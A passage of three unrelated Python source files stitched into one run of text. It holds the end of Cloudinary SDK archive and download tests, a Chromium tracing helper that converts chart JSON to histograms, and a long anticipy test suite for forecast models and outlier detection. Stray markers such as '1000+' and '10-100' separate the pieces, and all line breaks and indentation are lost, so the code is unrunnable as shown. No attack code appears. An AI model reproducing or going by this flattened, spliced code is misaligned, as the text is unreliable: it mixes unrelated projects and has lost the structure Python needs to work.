uploader.upload(TEST_IMAGE, tags=[TEST_TAG], transformation=dict(width=10)) @classmethod def tearDownClass(cls): cleanup_test_resources_by_tag([ (TEST_TAG,), (TEST_TAG_RAW, {'resource_type': 'raw'}), ]) @unittest.skipUnless(cloudinary.config().api_secret, "requires api_key/api_secret") def test_create_archive(self): """should successfully generate an archive""" result = uploader.create_archive(tags=[TEST_TAG], target_tags=[TEST_TAG_RAW]) self.assertEqual(2, result.get("file_count")) result2 = uploader.create_zip( tags=[TEST_TAG], transformations=[{"width": 0.5}, {"width": 2.0}], target_tags=[TEST_TAG_RAW]) self.assertEqual(4, result2.get("file_count")) @patch('urllib3.request.RequestMethods.request') @unittest.skipUnless(cloudinary.config().api_secret, "requires api_key/api_secret") def test_optional_parameters(self, mocker): """should allow optional parameters""" mocker.return_value = MOCK_RESPONSE expires_at = int(time.time()+3600) uploader.create_zip( tags=[TEST_TAG], expires_at=expires_at, allow_missing=True, skip_transformation_name=True, ) params = get_params(mocker.call_args[0]) self.assertEqual(params['expires_at'], expires_at) self.assertTrue(params['allow_missing']) self.assertTrue(params['skip_transformation_name']) @unittest.skipUnless(cloudinary.config().api_secret, "requires api_key/api_secret") def test_archive_url(self): result = utils.download_zip_url(tags=[TEST_TAG], transformations=[{"width": 0.5}, {"width": 2.0}]) http = urllib3.PoolManager( cert_reqs='CERT_REQUIRED', ca_certs=certifi.where() ) response = http.request('get', result) with tempfile.NamedTemporaryFile() as temp_file: temp_file_name = temp_file.name temp_file.write(response.data) temp_file.flush() with zipfile.ZipFile(temp_file_name, 'r') as zip_file: infos = zip_file.infolist() self.assertEqual(4, len(infos)) http.clear() @unittest.skipUnless(cloudinary.config().api_secret, "requires api_key/api_secret") def test_download_zip_url_options(self): result = utils.download_zip_url(tags=[TEST_TAG], transformations=[{"width": 0.5}, {"width": 2.0}], cloud_name="demo") upload_prefix = cloudinary.config().upload_prefix or "https://api.cloudinary.com" six.assertRegex(self, result, r'^{0}/v1_1/demo/.*$'.format(upload_prefix)) @unittest.skipUnless(cloudinary.config().api_secret, "requires api_key/api_secret") def test_download_folder(self): """Should generate and return a url for downloading a folder""" # Should return url with resource_type image download_folder_url = utils.download_folder(folder_path="samples/", resource_type="image") self.assertIn("image", download_folder_url) # Should return valid url download_folder_url = utils.download_folder(folder_path="folder/") self.assertTrue(download_folder_url) self.assertIn("generate_archive", download_folder_url) # Should flatten folder download_folder_url = utils.download_folder(folder_path="folder/", flatten_folders=True) self.assertIn("flatten_folders", download_folder_url) # Should expire_at folder expiration_time = int(time.time() + 60) download_folder_url = utils.download_folder(folder_path="folder/", expires_at=expiration_time) self.assertIn("expires_at", download_folder_url) # Should use original file_name of folder download_folder_url = utils.download_folder(folder_path="folder/", use_original_filename=True) self.assertIn("use_original_filename", download_folder_url) @patch('urllib3.request.RequestMethods.request') @unittest.skipUnless(cloudinary.config().api_secret, "requires api_key/api_secret") def test_create_archive_multiple_resource_types(self, mocker): """should allow fully_qualified_public_ids""" mocker.return_value = MOCK_RESPONSE test_ids = [ "image/upload/" + UNIQUE_TEST_ID, "video/upload/" + UNIQUE_TEST_ID, "raw/upload/" + UNIQUE_TEST_ID, ] uploader.create_zip( resource_type='auto', fully_qualified_public_ids=test_ids ) args, kargs = mocker.call_args self.assertTrue(get_uri(args).endswith('/auto/generate_archive')) self.assertEqual(test_ids, get_list_param(mocker, 'fully_qualified_public_ids')) @unittest.skipUnless(cloudinary.config().api_secret, "requires api_key/api_secret") def test_download_backedup_asset(self): download_backedup_asset_url = utils.download_backedup_asset('b71b23d9c89a81a254b88a91a9dad8cd', '0e493356d8a40b856c4863c026891a4e') self.assertIn("asset_id", download_backedup_asset_url) self.assertIn("version_id", download_backedup_asset_url) if __name__ == '__main__': unittest.main() 1000+ # Copyright 2016 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. import os import tracing_project import vinn def ConvertChartJson(chart_json): """Convert chart_json to Histograms. Args: chart_json: path to a file containing chart-json Returns: a Vinn result object whose 'returncode' indicates whether there was an exception, and whose 'stdout' contains HistogramSet json. """ return vinn.RunFile( os.path.join(os.path.dirname(__file__), 'convert_chart_json_cmdline.html'), source_paths=tracing_project.TracingProject().source_paths, js_args=[os.path.abspath(chart_json)]) 10-100 """ Author: Created on 04/12/2015 """ import unittest from argparse import Namespace from datetime import datetime from anticipy import forecast_models from anticipy.forecast import normalize_df from anticipy.forecast_models import * from anticipy.forecast_models import _fillna_wday from anticipy.model_utils import interpolate_df from anticipy.utils_test import PandasTest logger = logging.getLogger(__name__) logging.basicConfig(level=logging.INFO) def logger_info(msg, data): logger.info(msg + '\n%s', data) pd.set_option('display.max_columns', 40) pd.set_option('display.max_rows', 200) pd.set_option('display.width', 1000) def get_initial_guess(f_model, t_values): return f_model(t_values, None, None, get_aic_k=False) def array_ones_in_indices(n, l_indices): return np.isin(np.arange(0, n), l_indices).astype(float) def array_zeros_in_indices(n, l_indices): return (~np.isin(np.arange(0, n), l_indices)).astype(float) def array_true_in_indices(n, l_indices): return np.isin(np.arange(0, n), l_indices) class TestForecastModel(PandasTest): def setUp(self): pass def test_model_naive(self): a_x = np.arange(0, 10) a_date = pd.date_range('2014-01-01', periods=10, freq='D') a_y = 10 * a_x df_actuals = pd.DataFrame({'date': a_date, 'x': a_x, 'y': a_y}).head() a_y_result = model_naive(a_x, a_date, None, df_actuals=df_actuals) logger_info('a_y result: ', a_y_result) a_y_expected = np.array( [0., 0., 10, 20., 30., 40, 40., 40., 40., 40., ]) self.assert_array_equal(a_y_result, a_y_expected) # TODO: model composition disabled, check that exception is thrown # # Model composition # a_params = np.array([1.,0.,]) # a_y_result = (model_naive + model_linear) (a_x, a_date, a_params, # df_actuals=df_actuals) # logger_info('a_y result: ', a_y_result) def test_fillna_wday(self): a_x = np.arange(0, 70) a_date = pd.date_range('2014-01-01', periods=70, freq='D') a_y = 1. * a_x a_y_gap = np.where(np.isin(a_x, [5, 10, 15, 20]), np.NaN, a_y) df_actuals = pd.DataFrame({'date': a_date, 'x': a_x, 'y': a_y_gap}) time_start = datetime.now() df_result = _fillna_wday(df_actuals) runtime = datetime.now() - time_start logger_info('run time: ', runtime) logger_info('df_actuals:', df_actuals) logger_info('df_result:', df_result) def test_model_snaive_wday(self): logger.info('Test 1 - default settings') a_x = np.arange(0, 21) a_date = pd.date_range('2014-01-01', periods=21, freq='D') a_y = 10. * a_x df_actuals = pd.DataFrame({'date': a_date, 'x': a_x, 'y': a_y}).head(7) a_y_result = model_snaive_wday( a_x, a_date, None, df_actuals=df_actuals) logger_info('a_y result: ', a_y_result) a_y_expected = np.array( [np.NaN] * 7 + np.arange(0, 70., 10.).tolist() * 2) self.assert_array_equal(a_y_result, a_y_expected) logger.info('Test 2 - null values on last week') df_actuals = pd.DataFrame({'date': a_date, 'x': a_x, 'y': a_y}).head(14) df_actuals.y.iloc[-1] = np.NaN logger_info('actuals: ', df_actuals) a_y_result = model_snaive_wday( a_x, a_date, None, df_actuals=df_actuals) logger_info('a_y result: ', a_y_result) # TODO: model composition disabled, check that exception is thrown # # Model composition # a_params = np.array([1.,0.,]) # a_y_result = (model_naive + model_linear) (a_x, a_date, a_params, # df_actuals=df_actuals) # logger_info('a_y result: ', a_y_result) def test_forecast_model_simple_models(self): # TODO: test all models with is_mult True and False a_x = np.arange(0, 10) a_date = pd.date_range('2014-01-01', periods=10, freq='D') def test_model( name, model, params, a_expected, l_is_mult=None, a_date=a_date, a_x=a_x): if l_is_mult is None: l_is_mult = [True, False] for is_mult in l_is_mult: params = np.array(params) a = model(a_x, a_date, params, is_mult) logger_info('a {}, is_mult={} :'.format(name, is_mult), a) self.assert_array_equal(a, a_expected) # Test init params params = model.f_init_params(None, None, None) self.assertIsInstance(params, np.ndarray) bounds = model.f_bounds(None, None, None) logger.info('params: %s', params) self.assertTrue(validate_initial_guess(params, bounds)) params = model.f_init_params(a_x, None, a_x) self.assertIsInstance(params, np.ndarray) bounds = model.f_bounds(a_x, None, a_x) logger.info('a_x: %s', a_x) logger.info('params: %s', params) logger.info('bounds: %s', bounds) self.assertTrue(validate_initial_guess(params, bounds)) params = model.f_init_params(None, a_x, a_date) self.assertIsInstance(params, np.ndarray) bounds = model.f_bounds(None, a_x, a_x) logger.info('a_x: %s', a_x) logger.info('params: %s', params) logger.info('bounds: %s', bounds) self.assertTrue(validate_initial_guess(params, bounds)) params = model.f_init_params(a_x, a_x, a_date) self.assertIsInstance(params, np.ndarray) bounds = model.f_bounds(a_x, a_x, a_x) logger.info('params: %s', params) self.assertTrue(validate_initial_guess(params, bounds)) # Test cache dict_cache_vars = model.init_cache(a_x, a_date) logger.info('cache_vars: %s', dict_cache_vars) test_model('constant', model_constant, [42], np.full(10, 42.)) test_model('linear', model_linear, [-1., 10], np.arange(10., 0, -1)) test_model('ramp', model_ramp, [5., 1.], np.concatenate([np.full(5, 0.), np.arange(0, 5.)]), [False]) test_model('ramp', model_ramp, [5., 1.], np.concatenate([np.full(5, 1.), np.arange(1, 6.)]), [True]) test_model('exp', model_exp, [10., 2], np.array( [10., 20., 40., 80., 160., 320., 640., 1280., 2560., 5120.])) test_model('step', model_step, [5., 100.], np.array(5 * [0.] + 5 * [100.]), [False]) test_model('step', model_step, [5., 100.], np.array(5 * [1.] + 5 * [100.]), [True]) test_model('step_date', get_model_step_date('2014-01-06'), [100.], np.array(5 * [0.] + 5 * [100.]), [False]) test_model('step_date', get_model_step_date('2014-01-06'), [100.], np.array(5 * [1.] + 5 * [100.]), [True]) test_model('spike', model_spike, [10., 4., 6.], np.array(4 * [0.] + 2 * [10.] + 4 * [0.]), [False]) test_model('spike', model_spike, [10., 4., 6.], np.array(4 * [1.] + 2 * [10.] + 4 * [1.]), [True]) test_model('decay', model_decay, [10., -1000., 0.], np.array([10.] + 9 * [0.])) test_model( 'spike_date', get_model_spike_date( '2014-01-05', '2014-01-07'), [10.], np.array( 4 * [0.] + 2 * [10.] + 4 * [0.]), [False]) test_model( 'spike_date', get_model_spike_date( '2014-01-05', '2014-01-07'), [10.], np.array( 4 * [1.] + 2 * [10.] + 4 * [1.]), [True]) test_model('2 steps', model_two_steps, [5., 100., 7, 200.], np.array(5 * [0.] + 2 * [100.] + 3 * [300.]), [False]) test_model('2 steps', model_two_steps, [5., 100., 7, 3.], np.array(5 * [1.] + 2 * [100.] + 3 * [300.]), [True]) test_model('season_wday', model_season_wday, 10 * np.arange(1., 7.), np.array([20., 30., 40., 50., 60., 0, 10., 20., 30., 40.]), [False]) test_model('season_wday', model_season_wday, 10 * np.arange(1., 7.), np.array([20., 30., 40., 50., 60., 1, 10., 20., 30., 40.]), [True]) a_x2 = np.arange(0, 12) a_date2 = pd.date_range('2014-01-01', periods=12, freq='D') test_model('season_month', model_season_month, 10 * np.arange(2., 13.), np.array([60., 70., 80., 90., 100, 110., 120., 0., 20., 30., 40., 50., ]), [False], a_date=pd.date_range('2014-06-01', periods=12, freq='M'), a_x=a_x2) test_model('season_month', model_season_month, 10 * np.arange(2., 13.), np.array([60., 70., 80., 90., 100, 110., 120., 1., 20., 30., 40., 50., ]), [True], a_date=pd.date_range('2014-06-01', periods=12, freq='M'), a_x=a_x2) test_model('season_fourier_yearly', model_season_month, 10 * np.arange(2., 13.), np.array([60., 70., 80., 90., 100, 110., 120., 1., 20., 30., 40., 50., ]), [True], a_date=pd.date_range('2014-06-01', periods=12, freq='M'), a_x=a_x2) # test fourier model from anticipy.forecast_models import _f_init_params_fourier for is_mult in [False, True]: a_x = 10 * np.arange(2., 13.) a_date = pd.date_range('2014-06-01', periods=10, freq='M') params = _f_init_params_fourier() a = model_season_fourier_yearly(a_x, a_date, params, is_mult) logger_info( 'a {}, is_mult={} :'.format( 'model_season_fourier_yearly', is_mult), a) for is_mult in [False, True]: a_x = 10 * np.arange(2., 13.) a_date = pd.date_range('2014-06-01', periods=10, freq='M') params = np.full(20, 1.) a = model_season_fourier_yearly(a_x, a_date, params, is_mult) logger_info( 'a {}, is_mult={} :'.format( 'model_season_fourier_yearly', is_mult), a) test_model('ukcalendar', model_calendar_uk, [1, 1], # First parameter changes value of New Year array_ones_in_indices(10, 0) + np.ones(10), l_is_mult=[True]) test_model('ukcalendar', model_calendar_uk, [1, 1], # First parameter changes value of New Year array_ones_in_indices(10, 0) + np.zeros(10), l_is_mult=[False]) test_model('uscalendar', model_calendar_us, [1], # First parameter changes value of New Year array_ones_in_indices(10, 0) + np.ones(10), l_is_mult=[True]) test_model('uscalendar', model_calendar_us, [1], # First parameter changes value of New Year array_ones_in_indices(10, 0) + np.zeros(10), l_is_mult=[False]) def test_forecast_model_composite(self): a_x = np.arange(1, 11.) a_y = np.arange(1, 11.) a_date = pd.date_range('2014-01-01', periods=10, freq='D') a_date_month = pd.date_range('2014-01-01', periods=10, freq='M') dict_model = { 'constant': model_constant, 'linear': model_linear, 'ramp': model_ramp, 'exp': model_exp, 'season_wday': model_season_wday, # TODO: ADD season_wday_2 'season_month': model_season_month, 'step': model_step, 'two_steps': model_two_steps, } dict_params = { 'constant': np.array([1.]), 'linear': np.array([1., 0.]), 'ramp': np.array([6., 1.]), 'exp': np.array([1., 2.]), 'season_wday': np.arange(1., 7.), 'season_month': np.arange(2., 13.), 'step': np.array([6., 100.]), 'two_steps': np.array([6., 100., 8, 200.]), } dict_expected_add = { 'constant': np.full(10, 1.), 'linear': np.arange(1., 11.), 'ramp': np.concatenate([np.full(5, 0.), np.arange(0, 5.)]), 'exp': 2 ** np.arange(1., 11.), 'season_wday': np.arange(2., 12., ) % 7, 'season_month': np.full(10, 0.), 'step': np.array(5 * [0.] + 5 * [100.]), 'two_steps': np.array(5 * [0.] + 2 * [100.] + 3 * [300.]), } dict_expected_mult = { 'constant': np.full(10, 1.), 'linear': np.arange(1., 11.), 'ramp': np.concatenate([np.full(5, 1.), np.arange(1, 6.)]), 'exp': 2 ** np.arange(1., 11.), 'season_wday': np.array([2., 3., 4., 5., 6., 1., 1., 2., 3., 4., ]), 'season_month': np.full(10, 1.), 'step': np.array(5 * [1.] + 5 * [100.]), 'two_steps': np.array(5 * [1.] + 2 * [100.] + 3 * [20000.]), } def test_model_1(key): model = dict_model[key] initial_guess = model.f_init_params(a_x, a_y) logger.info('Testing model %s - name: %s', key, model.name) self.assert_array_equal( model( a_x, a_date, dict_params[key]), dict_expected_add[key]) logger.info('Initial guess: %s', model.f_init_params(a_x, a_y)) self.assertEqual(len(initial_guess), model.n_params) # Test cache dict_cache_vars = model.init_cache(a_x, a_date) logger.info('cache_vars: %s', dict_cache_vars) for key in dict_model.keys(): test_model_1(key) def test_model_2_add(key1, key2): model = dict_model[key1] + dict_model[key2] initial_guess = model.f_init_params(a_x, a_y) logger.info( 'Testing model %s, %s - name: %s', key1, key2, model.name) logger.info( 'Parameters: %s , %s', dict_params[key1], dict_params[key2]) logger.info('Initial guess: %s', initial_guess) self.assertEqual(len(initial_guess), model.n_params) model_output = model(a_x, a_date, np.concatenate( [dict_params[key1], dict_params[key2]])) logger.info('Model output: %s', model_output) self.assert_array_equal( model_output, dict_expected_add[key1] + dict_expected_add[key2]) # Test cache dict_cache_vars = model.init_cache(a_x, a_date) logger.info('cache_vars: %s', dict_cache_vars) for key1, key2 in itertools.product( dict_model.keys(), dict_model.keys()): logger.info('Keys: %s , %s', key1, key2) test_model_2_add(key1, key2) def test_model_2_mult(key1, key2): model = dict_model[key1] * dict_model[key2] initial_guess = model.f_init_params(a_x, a_y) logger.info( 'Testing model %s, %s - name: %s', key1, key2, model.name) logger.info( 'Parameters: %s , %s', dict_params[key1], dict_params[key2]) logger.info('Initial guess: %s', initial_guess) self.assertEqual(len(initial_guess), model.n_params) model_output = model(a_x, a_date, np.concatenate( [dict_params[key1], dict_params[key2]])) logger.info('Model output: %s', model_output) self.assert_array_equal( model_output, dict_expected_mult[key1] * dict_expected_mult[key2]) # Test cache dict_cache_vars = model.init_cache(a_x, a_date) logger.info('cache_vars: %s', dict_cache_vars) for key1, key2 in itertools.product( dict_model.keys(), dict_model.keys()): logger.info('Keys: %s , %s', key1, key2) test_model_2_mult(key1, key2) def test_forecast_model_composite_null(self): a_x = np.arange(0, 10.) a_y = np.arange(0, 10.) a_date = pd.date_range('2014-01-01', periods=10, freq='D') a_date_month = pd.date_range('2014-01-01', periods=10, freq='M') dict_model = { 'constant': model_constant, 'linear': model_linear, 'exp': model_exp, 'season_wday': model_season_wday, 'season_month': model_season_month, } dict_params = { 'constant': np.array([1.]), 'linear': np.array([1., 0.]), 'exp': np.array([1., 2.]), 'season_wday': np.arange(1., 7.), 'season_month': np.arange(1., 13.) } dict_expected = { 'constant': np.full(10, 1.), 'linear': np.arange(0., 10.), 'exp': 2 ** np.arange(0., 10.), 'season_wday': np.arange(2., 12., ) % 7, 'season_month': np.full(10, 0.), } def test_model_2_add_null(key1): model = dict_model[key1] + model_null initial_guess = model.f_init_params(a_x, a_y) logger.info('Testing model %s, - name: %s', key1, model.name) logger.info('Parameters: %s', dict_params[key1]) logger.info('Initial guess: %s', initial_guess) self.assertEqual(len(initial_guess), model.n_params) self.assert_array_equal(model(a_x, a_date, dict_params[key1]), dict_expected[key1]) for key in dict_model.keys(): test_model_2_add_null(key) def test_model_2_mult_null(key1): model_original = dict_model[key1] model = model_original * model_null initial_guess = model.f_init_params(a_x, a_y) logger.info('Testing model %s, - name: %s', key1, model.name) logger.info('Parameters: %s', dict_params[key1]) logger.info('Initial guess: %s', initial_guess) self.assertEqual(model, model_original) for key in dict_model.keys(): test_model_2_mult_null(key) def test_forecast_model_composite_3(self): # Test composition of 3+ models a_x = np.arange(0, 10.) a_y = np.arange(0, 10.) a_date = pd.date_range('2014-01-01', periods=10, freq='D') a_date_month = pd.date_range('2014-01-01', periods=10, freq='M') dict_model = { 'constant': model_constant, 'linear': model_linear, 'ramp': model_ramp, 'exp': model_exp, 'season_wday': model_season_wday, 'season_month': model_season_month, } dict_params = { 'constant': np.array([1.]), 'linear': np.array([1., 0.]), 'ramp': np.array([6., 1.]), 'exp': np.array([1., 2.]), 'season_wday': np.arange(1., 7.), 'season_month': np.arange(1., 13.) } dict_expected = { 'constant': np.full(10, 1.), 'linear': np.arange(0., 10.), 'ramp': np.concatenate([np.full(5, 0.), np.arange(0, 5.)]), 'exp': 2 ** np.arange(0., 10.), 'season_wday': # np.arange(2., 12., ) % 7, np.array([2., 3., 4., 5., 6., 1., 1., 2., 3., 4.]), 'season_month': np.full(10, 1.), } def test_model_3(model, params, expected): initial_guess = model.f_init_params(a_x, a_y) logger.info('Testing model: %s', model.name) logger.info('Parameters: %s', params) logger.info('Initial guess: %s', initial_guess) self.assertEqual(len(initial_guess), model.n_params) self.assert_array_equal(model(a_x, a_date, params), expected) test_model_3( (model_linear * model_linear) + model_constant, np.concatenate([dict_params['linear'], dict_params['linear'], dict_params['constant']]), (dict_expected['linear'] * dict_expected['linear']) + dict_expected['constant'] ) test_model_3( model_linear * (model_linear + model_constant), np.concatenate([dict_params['linear'], dict_params['linear'], dict_params['constant']]), dict_expected['linear'] * (dict_expected['linear'] + dict_expected['constant']) ) test_model_3( (model_linear * model_season_wday) + model_constant, np.concatenate([dict_params['linear'], dict_params['season_wday'], dict_params['constant']]), (dict_expected['linear'] * dict_expected['season_wday']) + dict_expected['constant'] ) def test_forecast_model_bounds(self): dict_model = { 'constant': model_constant, 'linear': model_linear, 'exp': model_exp, 'season_wday': model_season_wday, 'season_month': model_season_month, 'step': model_step, 'two_steps': model_two_steps, 'sigmoid_step': model_sigmoid_step, 'ramp': model_ramp } dict_expected = dict() for model_name, model_obj in dict_model.items(): n_params = model_obj.n_params exp = n_params * [-np.inf], n_params * [np.inf] dict_expected[model_name] = exp # Manually set the boundaries here dict_expected['sigmoid_step'] = ( [-np.inf, -np.inf, 0.0], [np.inf, np.inf, np.inf]) def test_model_bounds(key, model, expected): bounds = model.f_bounds() params = model.n_params logger.info('Testing model: %s', model.name) logger.info('Bounds: %s', bounds) logger.info('Expected: %s', expected) self.assertEqual(params, len(bounds[0])) self.assertTupleEqual(bounds, expected) for model_name, model_obj in dict_model.items(): test_model_bounds(model_name, model_obj, dict_expected[model_name]) def test_get_model_outliers(self): # TODO: change input dfs to normalized form, rather than call # normalize_df # Test 1 - no outliers a_y = [20.0, 20.1, 20.2, 20.3, 20.4, 20.5] a_date = pd.date_range(start='2018-01-01', periods=len(a_y), freq='D') df = pd.DataFrame({'y': a_y}).pipe(normalize_df) mask_step, mask_spike = get_model_outliers(df) logger.info('Model 1a: Step: %s, Spike: %s ', mask_step, mask_spike) self.assert_array_equal(mask_step, np.full(len(a_y), False)) self.assert_array_equal(mask_spike, np.full(len(a_y), False)) # 1b - with datetime index df = pd.DataFrame({'y': a_y}, index=a_date).pipe(normalize_df) mask_step, mask_spike = get_model_outliers(df) logger.info('Model 1b: Step: %s, Spike: %s ', mask_step, mask_spike) self.assert_array_equal(mask_step, np.full(len(a_y), False)) self.assert_array_equal(mask_spike, np.full(len(a_y), False)) # Test 2 - Single step a_y = np.array([19.8, 19.9, 20.0, 20.1, 20.2, 20.3, 20.4, 20.5, 20.6, 10., 10.1, 10.2, 10.3, 10.4, 10.5, 10.6, 10.7, 10.8, 10.9]) a_date = pd.date_range(start='2018-01-01', periods=len(a_y), freq='D') df = pd.DataFrame({'y': a_y}).pipe(normalize_df) mask_step, mask_spike = get_model_outliers(df) logger.info('Model 2a: Step: %s, Spike: %s ', mask_step, mask_spike) self.assert_array_equal(mask_step, array_true_in_indices(a_y.size, 9)) self.assert_array_equal(mask_spike, np.full(len(a_y), False)) # 2b - with date column df = pd.DataFrame({'y': a_y}, index=a_date).pipe(normalize_df) mask_step, mask_spike = get_model_outliers(df) logger.info('Model 2b: Step: %s, Spike: %s ', mask_step, mask_spike) self.assert_array_equal(mask_step, array_true_in_indices(a_y.size, 9)) self.assert_array_equal(mask_spike, np.full(len(a_y), False)) # Test 3 - Two step changes a_y = np.array([-1, 0, 1, 2, 3, 5, 6, 8, 10, 15, 16, 18, 20.1, 20.2, 20.3, 20.4, 20.5, 20.6, 10., 10.1, 10.2, 10.3, 10.4]) df = pd.DataFrame({'y': a_y}).pipe(normalize_df) mask_step, mask_spike = get_model_outliers(df) logger.info('Model 3: Step: %s, Spike: %s ', mask_step, mask_spike) self.assert_array_equal(mask_step, array_true_in_indices(a_y.size, [9, 18])) self.assert_array_equal(mask_spike, np.full(len(a_y), False)) # Test 4 - Consecutive changes a_y = np.array([-1, 0, 1, 2, 3, 5, 6, 8, 15, 16, 21, 20.1, 20.2, 20.3, 20.4, 20.5, 20.6, 20.7, 20.8, 10., 10.1, 10.2, 10.3, 10.4]) df = pd.DataFrame({'y': a_y}).pipe(normalize_df) mask_step, mask_spike = get_model_outliers(df) logger.info('Model 4: Step: %s, Spike: %s ', mask_step, mask_spike) self.assert_array_equal( mask_step, array_true_in_indices( a_y.size, [ 8, 9, 10, 19])) self.assert_array_equal(mask_spike, np.full(len(a_y), False)) # spikes # Test 5 - 2 spikes and 1 step a_y = np.array([19.8, 19.9, 30.0, 30.1, 20.2, 20.3, 20.4, 20.5, 20.6, 10., 10.1, 10.2, 10.3, 10.4, 10.5, 10.6, 30.7, 10.8, 10.9]) df = pd.DataFrame({'y': a_y}).pipe(normalize_df) mask_step, mask_spike = get_model_outliers(df) logger.info('Model 5a: Step: %s, Spike: %s ', mask_step, mask_spike) self.assert_array_equal(mask_step, array_true_in_indices(a_y.size, [9])) self.assert_array_equal(mask_spike, array_true_in_indices(a_y.size, [2, 3, 16])) # 5b - with datetime index a_date = pd.date_range(start='2018-01-01', periods=len(a_y), freq='D') df = pd.DataFrame({'y': a_y}, index=a_date).pipe(normalize_df) mask_step, mask_spike = get_model_outliers(df) logger.info('Model 5b: Step: %s, Spike: %s ', mask_step, mask_spike) self.assert_array_equal(mask_step, array_ones_in_indices(a_y.size, [9])) self.assert_array_equal(mask_spike, array_true_in_indices(a_y.size, [2, 3, 16])) # Test 6a - single spike a_y = np.array([19.8, 19.9, 20.0, 20.1, 20.2, 20.3, 20.4, 20.5, 20.6, 10., 20.8, 20.9, 21.0, 21.1, 21.2, 21.3, 21.4, 21.5, 21.6]) df = pd.DataFrame({'y': a_y}).pipe(normalize_df) mask_step, mask_spike = get_model_outliers(df) logger.info('Model 6a: Step: %s, Spike: %s ', mask_step, mask_spike) self.assert_array_equal(mask_step, np.full(len(a_y), False)) self.assert_array_equal(mask_spike, array_true_in_indices(a_y.size, [9])) # Test 6b - single spike co-located with step a_y = np.array([19.8, 19.9, 20.0, 20.1, 20.2, 20.3, 20.4, 20.5, 20.6, 10., 30.7, 30.8, 30.9, 31.0, 31.1, 31.2, 31.3, 31.4, 31.5]) df = pd.DataFrame({'y': a_y}).pipe(normalize_df) mask_step, mask_spike = get_model_outliers(df) logger.info('Model 6b: Step: %s, Spike: %s ', mask_step, mask_spike) self.assert_array_equal(mask_step, array_true_in_indices(a_y.size, [9, 10])) self.assert_array_equal(mask_spike, array_true_in_indices(a_y.size, [9])) # TODO: Work in progress @unittest.skip('outliers with gap not implemented yet') def test_get_model_outliers_withgap(self): # # Test 1 - short series with null value - nulls cause no outliers a_y = [0., 1., np.NaN, 3., 4., 5., 6., 7., ] a_date = pd.date_range(start='2018-01-01', periods=len(a_y), freq='D') df = pd.DataFrame({'y': a_y, 'date': a_date}).pipe(normalize_df) mask_step, mask_spike = get_model_outliers(df) logger_info('Model 1:', mask_step) self.assertIsNone(mask_step) self.assertIsNone(mask_spike) # Test 1b - series with multiple values per x -- raises ValueError a_y = np.arange(0, 10.) a_date = pd.date_range(start='2018-01-01', periods=len(a_y), freq='D') df = pd.DataFrame({'y': a_y, 'date': a_date}) df = pd.concat([df.head(5), df.head(6).tail(2)]).pipe(normalize_df) with self.assertRaises(ValueError): mask_step, mask_spike = get_model_outliers(df) # Test 2 - short series with gap value - no real outliers a_y = np.arange(0, 10.) a_date = pd.date_range(start='2018-01-01', periods=len(a_y), freq='D') df = pd.DataFrame({'y': a_y, 'date': a_date}) df = pd.concat([df.head(5), df.tail(-6)]).pipe(normalize_df) mask_step, mask_spike = get_model_outliers(df) logger_info('Model 1:', mask_step) self.assertIsNotNone(mask_step) # Incorrectly finds a step self.assertIsNone(mask_spike) # No spikes # Test 2b - after interpolating, can get outliers - finds none df_nogap = df.pipe(interpolate_df, include_mask=True) mask_step, mask_spike = get_model_outliers(df_nogap) logger_info('df 1 - no gap:', df_nogap) self.assertIsNone(mask_step) # No steps self.assertIsNone(mask_spike) # No spikes # # Test 3 - short series with gap value - with outliers a_y = np.arange(0, 10.) a_y2 = np.arange(1, 11.) a_date = pd.date_range(start='2018-01-01', periods=len(a_y), freq='D') df = pd.DataFrame({'y': a_y, 'date': a_date}) df2 = pd.DataFrame({'y': a_y2, 'date': a_date}) df = pd.concat([df.head(5), df2.tail(-6)]).pipe(normalize_df) mask_step, mask_spike = get_model_outliers(df) logger_info('Model 1:', mask_step) self.assertIsNotNone(mask_step) # Incorrectly finds a step self.assertIsNone(mask_spike) # No spikes # Test 3b - after interpolating with interpolate_df() - TODO: REMOVE # THIS df_nogap = df.pipe(interpolate_df, include_mask=True) mask_step, mask_spike = get_model_outliers(df_nogap) df_nogap['mask_step'] = mask_step df_nogap['step_in_filled_gap'] = df_nogap.mask_step * \ df_nogap.is_gap_filled df_nogap['mask_step_patch'] = df_nogap.step_in_filled_gap.shift( -1).fillna(0) df_nogap = df_nogap.loc[~df_nogap.is_gap_filled] df_nogap['mask_step_patch'] = df_nogap.mask_step_patch.shift( 1).fillna(0) df_nogap['mask_step'] = df_nogap.mask_step + df_nogap.mask_step_patch df_nogap = df_nogap[['date', 'x', 'y', 'mask_step']] logger_info('df 1 - no gap:', df_nogap) self.assert_array_equal( df_nogap.mask_step, array_ones_in_indices( df_nogap.index.size, [5])) self.assertIsNone(mask_spike) # No spikes # TODO: we need to # - filter out filled gaps # - get list of steps # - if a step is in a filled gap, move to next sample def test_get_fixed_model(self): logger.info('Test 1 - default settings') a_x = np.arange(0, 10) a_date = pd.date_range('2014-01-01', periods=10, freq='D') a1 = model_constant(a_x, a_date, np.array([42])) model_constant_fixed = get_fixed_model(model_constant, np.array([42])) print(model_constant_fixed) a2 = model_constant_fixed(a_x, a_date, None) self.assert_array_equal(a1, a2) logger.info('Test 2 - 0-param model') model_out = get_fixed_model(model_naive, []) self.assertEqual(model_out.name, 'naive') def test_fix_params_fmodel(self): a_x = np.arange(0, 10) a_date = pd.date_range('2014-01-01', periods=10, freq='D') a1 = model_linear(a_x, a_date, np.array([10., -1.])) model_linear_fixed = fix_params_fmodel(model_linear, [10., np.NaN]) logger_info('model_linear_fixed:', model_linear_fixed) self.assertEqual(model_linear_fixed.n_params, 1) a2 = model_linear_fixed(a_x, a_date, params=[-1.]) self.assert_array_equal(a1, a2) # TODO: Implement test def test_validate_model_bounds(self): pass def test_get_l_model_auto_season(self): logger.info('Test 0 - Test for series with single sample') a_date = pd.a_date = pd.date_range('2014-01-01', periods=1, freq='D') l_expected = [model_null] l_result = get_l_model_auto_season(a_date) self.assert_array_equal(l_result, l_expected) logger.info('Test 1 - Tests for series with daily samples') # Test 1.1 - not enough samples for weekly seasonality a_date = pd.a_date = pd.date_range('2014-01-01', periods=10, freq='D') l_expected = [model_null] l_result = get_l_model_auto_season(a_date) self.assert_array_equal(l_result, l_expected) # Test 1.2 - enough samples for weekly seasonality a_date = pd.a_date = pd.date_range('2014-01-01', periods=12, freq='D') l_expected = [model_null, model_season_wday] l_result = get_l_model_auto_season(a_date, min_periods=1.5) self.assert_array_equal(l_result, l_expected) # Test 1.2b - l_season_yearly is empty list l_result = get_l_model_auto_season( a_date, l_season_yearly=[], min_periods=1.5) self.assert_array_equal(l_result, l_expected) # 